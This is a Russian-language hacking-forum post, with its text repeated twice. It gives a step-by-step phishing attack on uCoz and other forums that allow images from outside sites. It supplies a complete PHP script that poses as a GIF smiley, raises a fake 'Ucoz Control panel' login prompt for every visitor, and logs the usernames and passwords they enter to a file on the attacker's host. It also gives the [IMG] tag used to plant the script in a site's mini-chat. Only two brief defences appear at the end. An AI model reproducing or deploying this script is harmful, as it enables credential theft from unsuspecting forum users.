Всем привет !
Так и не смог найти, здесь это уже обсуждалось, Антоха даже демонстрировал эту атаку здесь на форуме, но на одном хак. ресурсе попалась интересная инфа, как "Оторваться" на юкозе, хотя данный способ применим почти на любом форуме...
Суть способа:
На многих форумах, блогах, чатах можно загружать картинки со сторонних сайтов, так-вот, суть "Уязвимости" в том, что можно настроить так сервер, что у жертвы будет постоянно появляться фома авторизации, например такая:
И если пользователь невнимателен, то может указать свой аккаунт, причём данный способ позволяет делать маскировку, т.е. что-бы форма постоянно не появлялась !
Итак более подробней на примере юкоза (Но можете попробовать и на форумах, добавив указанную картинку в подпись или в пост/чат например):
Для начала нужно зарегистрировать хостинг с поддержкой php (например бегет, хотингер, не важно) .
После регистрации льем на фтп скрипт и ставим права 777 на пустой .txt файл, например : passwords.txt (сюда будут присылаться пассы пользователей "похаканного" сайта).
Также скачайте любой смайлик в расширении .gif (типа cool.gif ), этот смайлик для маскировки, что-бы окошко постоянно не дербанилась, сделайте на него права 777 !
Затем откройте блокнот, да простой блокнот и напишите следующее:
Как только вы напишите всё - сохраните файл под названием smile, потом поменяйте расширение на php и залейте на хостинг, например smile.php (Незабудьте выставить права 777 или 755).
Теперь выбирайте любой юкозовский сайт, слева юкозовских сайтов как обычно, у большинства есть мини-чат справа.
Так вот - для начала зарегистируйтесь на сайте, потом в мини чате напишите логин, а в содержании сообщения напишите следующее:
И нажмите ОК. Если после этого в миничате вместо сообщения появился смайлик - значит радуйтесь, т.к. сайт - уязвимый.
После этого у всех кто будет заходить на данную страницу, будет появлятся форма в которую нужно будет ввести логин и пароль. У вас при входе на сайт такая форма будет появлятся тоже. И все, введеные логины и пароли в эту форму будут отсылатся в пустой файл passwords.txt, который вы создали в самом начале и залили на фтп.
ТОЖЕ ПРИМЕНИМО И ДЛЯ ФОРУМОВ, И БЛОГОВ, ГДЕ РАЗРЕШЕНО ВСТАВКА КАРТИНОК СО СТОРОННИХ РЕСУРСОВ !
Способы защиты:
1) Отключить вставку картинок со сторонних ресурсов;
2) Сделать проксирование картинок к себе на сервер.
У меня всё, кстати если найдёте тему где это обсуждалось уже здесь, запостите в этой теме, для доп. информации...
Так и не смог найти, здесь это уже обсуждалось, Антоха даже демонстрировал эту атаку здесь на форуме, но на одном хак. ресурсе попалась интересная инфа, как "Оторваться" на юкозе, хотя данный способ применим почти на любом форуме...
Суть способа:
На многих форумах, блогах, чатах можно загружать картинки со сторонних сайтов, так-вот, суть "Уязвимости" в том, что можно настроить так сервер, что у жертвы будет постоянно появляться фома авторизации, например такая:
И если пользователь невнимателен, то может указать свой аккаунт, причём данный способ позволяет делать маскировку, т.е. что-бы форма постоянно не появлялась !
Итак более подробней на примере юкоза (Но можете попробовать и на форумах, добавив указанную картинку в подпись или в пост/чат например):
Для начала нужно зарегистрировать хостинг с поддержкой php (например бегет, хотингер, не важно) .
После регистрации льем на фтп скрипт и ставим права 777 на пустой .txt файл, например : passwords.txt (сюда будут присылаться пассы пользователей "похаканного" сайта).
Также скачайте любой смайлик в расширении .gif (типа cool.gif ), этот смайлик для маскировки, что-бы окошко постоянно не дербанилась, сделайте на него права 777 !
Затем откройте блокнот, да простой блокнот и напишите следующее:
Код:
header("Content-type: image/gif");
$image = imagecreatefromgif('cool.gif');
if(!$_COOKIE['LOGON'])
{
$login = $_SERVER['PHP_AUTH_USER'];
$pass = $_SERVER['PHP_AUTH_PW'];
if(strlen($pass) <= 4 || !$login)
{
Header('HTTP/1.1 401 Unauthorized');
Header('WWW-Authenticate: Basic realm="Ucoz Control panel"');
}
elseif($login)
{
setcookie('LOGON',md5($pass));
$f = fopen('passwords.txt', 'ab');
fwrite($f, $login." ||| ".$pass."\r\n");
fclose($f);
}
}
imagegif($image);
imagedestroy($image);
?>Как только вы напишите всё - сохраните файл под названием smile, потом поменяйте расширение на php и залейте на хостинг, например smile.php (Незабудьте выставить права 777 или 755).
Теперь выбирайте любой юкозовский сайт, слева юкозовских сайтов как обычно, у большинства есть мини-чат справа.
Так вот - для начала зарегистируйтесь на сайте, потом в мини чате напишите логин, а в содержании сообщения напишите следующее:
HTML:
[IMG]http://mysite.phphost.net/smile.php[/IMG]И нажмите ОК. Если после этого в миничате вместо сообщения появился смайлик - значит радуйтесь, т.к. сайт - уязвимый.
После этого у всех кто будет заходить на данную страницу, будет появлятся форма в которую нужно будет ввести логин и пароль. У вас при входе на сайт такая форма будет появлятся тоже. И все, введеные логины и пароли в эту форму будут отсылатся в пустой файл passwords.txt, который вы создали в самом начале и залили на фтп.
ТОЖЕ ПРИМЕНИМО И ДЛЯ ФОРУМОВ, И БЛОГОВ, ГДЕ РАЗРЕШЕНО ВСТАВКА КАРТИНОК СО СТОРОННИХ РЕСУРСОВ !
Способы защиты:
1) Отключить вставку картинок со сторонних ресурсов;
2) Сделать проксирование картинок к себе на сервер.
У меня всё, кстати если найдёте тему где это обсуждалось уже здесь, запостите в этой теме, для доп. информации...
